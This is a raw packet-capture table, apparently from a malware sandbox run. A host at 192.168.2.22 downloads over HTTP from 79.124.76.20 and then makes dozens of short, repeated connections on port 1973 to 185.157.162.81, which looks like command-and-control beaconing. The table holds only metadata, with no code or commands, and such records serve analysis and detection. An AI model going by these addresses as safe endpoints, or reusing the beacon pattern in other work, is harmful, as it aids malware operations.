Jan 5, 2021 10:06:48.913799047 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913830042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913837910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.913839102 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913846016 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913866043 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913914919 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913929939 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913954973 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913963079 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.913999081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914082050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914113045 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.914202929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914321899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914392948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914539099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914745092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914804935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914973974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.914990902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.915232897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.915250063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.917085886 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.917117119 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.917892933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.917911053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918085098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918123007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918329954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918345928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918561935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918592930 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918777943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.918795109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919013977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919086933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919241905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919275999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919456005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919488907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919715881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919768095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919939995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.919956923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920162916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920264006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920290947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920350075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920481920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920567036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920682907 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.920794010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921049118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921128035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921288013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921304941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921484947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921561956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921669960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921721935 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921843052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.921962976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.922040939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.922163010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.922281027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.922398090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.922538996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.922554016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.923888922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.923907042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.923922062 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.923978090 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.923989058 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:52.337721109 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:07:37.411828995 CET	49171	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:37.478250027 CET	1973	49171	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:37.975536108 CET	49171	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:38.073329926 CET	1973	49171	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:38.583962917 CET	49171	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:38.661026001 CET	1973	49171	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:41.891266108 CET	49172	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:42.116072893 CET	1973	49172	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:42.624727011 CET	49172	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:42.736958027 CET	1973	49172	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:43.233185053 CET	49172	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:43.617898941 CET	1973	49172	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:43.790935040 CET	49173	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:43.988468885 CET	1973	49173	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:44.481306076 CET	49173	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:44.720963001 CET	1973	49173	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:45.230269909 CET	49173	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:45.453850031 CET	1973	49173	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:45.631311893 CET	49174	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:45.729556084 CET	1973	49174	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:46.228832960 CET	49174	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:46.343031883 CET	1973	49174	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:46.852765083 CET	49174	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:46.924686909 CET	1973	49174	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:47.141784906 CET	49175	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:47.256107092 CET	1973	49175	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:47.757720947 CET	49175	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:47.844263077 CET	1973	49175	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:48.350398064 CET	49175	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:48.424071074 CET	1973	49175	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:48.611623049 CET	49176	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:48.693294048 CET	1973	49176	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:49.193073034 CET	49176	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:49.262963057 CET	1973	49176	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:49.770272970 CET	49176	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:49.853657961 CET	1973	49176	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:50.020807981 CET	49177	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:50.094327927 CET	1973	49177	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:50.596995115 CET	49177	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:50.679600954 CET	1973	49177	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:51.174551964 CET	49177	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:51.249650002 CET	1973	49177	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:51.421449900 CET	49178	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:51.512928009 CET	1973	49178	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:52.016954899 CET	49178	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:52.112886906 CET	1973	49178	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:52.625277042 CET	49178	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:53.044905901 CET	1973	49178	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:53.204319954 CET	49179	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:53.639380932 CET	1973	49179	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:54.138650894 CET	49179	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:54.371685028 CET	1973	49179	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:54.887439966 CET	49179	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:55.017024994 CET	1973	49179	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:55.321228027 CET	49180	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:55.408301115 CET	1973	49180	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:55.917212963 CET	49180	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:56.321228027 CET	1973	49180	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:56.837801933 CET	49180	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:56.950397015 CET	1973	49180	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:57.151873112 CET	49181	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:57.224715948 CET	1973	49181	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:57.742521048 CET	49181	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:57.821571112 CET	1973	49181	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:58.335534096 CET	49181	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:58.403330088 CET	1973	49181	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:58.587038040 CET	49182	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:58.652606964 CET	1973	49182	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:59.162312031 CET	49182	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:59.238339901 CET	1973	49182	185.157.162.81	192.168.2.22
Jan 5, 2021 10:07:59.739622116 CET	49182	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:07:59.968012094 CET	1973	49182	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:00.147037029 CET	49183	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:00.301537991 CET	1973	49183	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:00.816191912 CET	49183	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:00.922034979 CET	1973	49183	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:01.440128088 CET	49183	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:01.738090038 CET	1973	49183	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:01.933522940 CET	49184	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:02.012463093 CET	1973	49184	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:02.516649008 CET	49184	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:02.587112904 CET	1973	49184	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:03.093806982 CET	49184	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:03.209538937 CET	1973	49184	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:03.373637915 CET	49185	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:03.441207886 CET	1973	49185	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:03.936350107 CET	49185	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:04.010180950 CET	1973	49185	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:04.513432980 CET	49185	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:04.696434975 CET	1973	49185	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:04.894613028 CET	49186	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:05.003783941 CET	1973	49186	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:05.512142897 CET	49186	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:05.581828117 CET	1973	49186	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:06.089322090 CET	49186	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:06.197356939 CET	1973	49186	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:06.357631922 CET	49187	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:06.431699038 CET	1973	49187	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:06.931930065 CET	49187	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:07.023857117 CET	1973	49187	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:07.540127993 CET	49187	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:07.630242109 CET	1973	49187	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:07.797544956 CET	49188	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:07.865561962 CET	1973	49188	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:08.367144108 CET	49188	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:08.480509996 CET	1973	49188	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:08.975677967 CET	49188	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:09.055906057 CET	1973	49188	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:09.212081909 CET	49189	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:09.285691023 CET	1973	49189	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:09.786940098 CET	49189	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:09.865864038 CET	1973	49189	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:10.364129066 CET	49189	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:10.464987993 CET	1973	49189	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:10.633960009 CET	49190	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:10.739562988 CET	1973	49190	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:11.253304005 CET	49190	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:11.320699930 CET	1973	49190	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:11.815103054 CET	49190	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:11.882467031 CET	1973	49190	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:12.084027052 CET	49191	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:12.155680895 CET	1973	49191	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:12.673074007 CET	49191	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:12.766911030 CET	1973	49191	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:13.265873909 CET	49191	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:13.336091042 CET	1973	49191	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:13.505832911 CET	49192	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:13.576420069 CET	1973	49192	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:14.077200890 CET	49192	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:14.145180941 CET	1973	49192	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:14.654437065 CET	49192	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:14.731304884 CET	1973	49192	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:14.892863989 CET	49193	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:14.978965998 CET	1973	49193	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:15.481312037 CET	49193	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:15.676965952 CET	1973	49193	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:16.183554888 CET	49193	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:16.261593103 CET	1973	49193	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:16.453779936 CET	49194	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:16.548144102 CET	1973	49194	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:17.056982040 CET	49194	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:17.142652035 CET	1973	49194	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:17.634371996 CET	49194	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:17.709542990 CET	1973	49194	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:17.878025055 CET	49195	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:17.982837915 CET	1973	49195	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:18.476782084 CET	49195	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:18.548371077 CET	1973	49195	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:19.056102037 CET	49195	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:19.122771025 CET	1973	49195	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:19.309983015 CET	49196	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:19.449717999 CET	1973	49196	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:19.958770990 CET	49196	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:20.036540031 CET	1973	49196	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:20.536030054 CET	49196	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:20.618382931 CET	1973	49196	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:20.798962116 CET	49197	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:20.869564056 CET	1973	49197	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:21.378660917 CET	49197	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:21.448024988 CET	1973	49197	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:21.955916882 CET	49197	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:22.248748064 CET	1973	49197	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:22.447246075 CET	49198	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:22.556211948 CET	1973	49198	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:23.063576937 CET	49198	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:23.147159100 CET	1973	49198	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:23.656496048 CET	49198	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:23.834203959 CET	1973	49198	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:24.001692057 CET	49199	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:24.127832890 CET	1973	49199	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:24.639436007 CET	49199	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:24.707412958 CET	1973	49199	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:25.216455936 CET	49199	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:25.283333063 CET	1973	49199	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:25.455049992 CET	49200	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:25.522959948 CET	1973	49200	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:26.027875900 CET	49200	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:26.094610929 CET	1973	49200	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:26.605086088 CET	49200	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:26.671886921 CET	1973	49200	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:26.849219084 CET	49201	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:26.918235064 CET	1973	49201	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:27.416210890 CET	49201	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:27.503479004 CET	1973	49201	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:28.009223938 CET	49201	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:28.128494024 CET	1973	49201	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:28.301378965 CET	49202	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:28.451085091 CET	1973	49202	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:28.960799932 CET	49202	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:29.028506041 CET	1973	49202	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:29.538104057 CET	49202	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:29.725532055 CET	1973	49202	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:29.890410900 CET	49203	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:29.965099096 CET	1973	49203	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:30.474193096 CET	49203	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:30.552218914 CET	1973	49203	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:31.051383972 CET	49203	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:31.119669914 CET	1973	49203	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:31.297965050 CET	49204	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:31.366499901 CET	1973	49204	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:31.878365040 CET	49204	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:31.981539011 CET	1973	49204	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:32.486670017 CET	49204	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:32.553349972 CET	1973	49204	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:32.728848934 CET	49205	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:32.801028967 CET	1973	49205	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:33.313591957 CET	49205	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:33.428344011 CET	1973	49205	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:33.937740088 CET	49205	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:34.063824892 CET	1973	49205	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:34.226722002 CET	49206	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:34.295964956 CET	1973	49206	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:34.811408043 CET	49206	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:35.136907101 CET	1973	49206	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:35.654313087 CET	49206	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:35.795322895 CET	1973	49206	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:35.975821018 CET	49207	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:36.043875933 CET	1973	49207	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:36.543107033 CET	49207	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:36.637314081 CET	1973	49207	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:37.135953903 CET	49207	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:37.202792883 CET	1973	49207	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:37.365418911 CET	49208	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:37.453063965 CET	1973	49208	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:37.962843895 CET	49208	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:38.405337095 CET	1973	49208	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:38.914401054 CET	49208	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:38.984852076 CET	1973	49208	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:39.159347057 CET	49209	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:39.229507923 CET	1973	49209	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:39.741460085 CET	49209	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:45.747778893 CET	49209	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:45.895427942 CET	1973	49209	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:46.067476988 CET	49210	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:46.281646013 CET	1973	49210	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:46.777668953 CET	49210	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:46.870513916 CET	1973	49210	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:47.370436907 CET	49210	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:47.456600904 CET	1973	49210	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:47.629587889 CET	49211	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:47.883172989 CET	1973	49211	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:48.384582996 CET	49211	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:48.484385014 CET	1973	49211	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:48.977304935 CET	49211	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:49.064014912 CET	1973	49211	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:49.234556913 CET	49212	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:49.413486004 CET	1973	49212	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:49.913528919 CET	49212	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:50.137938023 CET	1973	49212	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:50.646754980 CET	49212	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:50.923249960 CET	1973	49212	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:51.075938940 CET	49213	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:51.194061041 CET	1973	49213	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:51.692152023 CET	49213	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:51.830821037 CET	1973	49213	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:52.331814051 CET	49213	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:52.656460047 CET	1973	49213	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:52.803827047 CET	49214	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:52.931478977 CET	1973	49214	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:53.439373970 CET	49214	1973	192.168.2.22	185.157.162.81
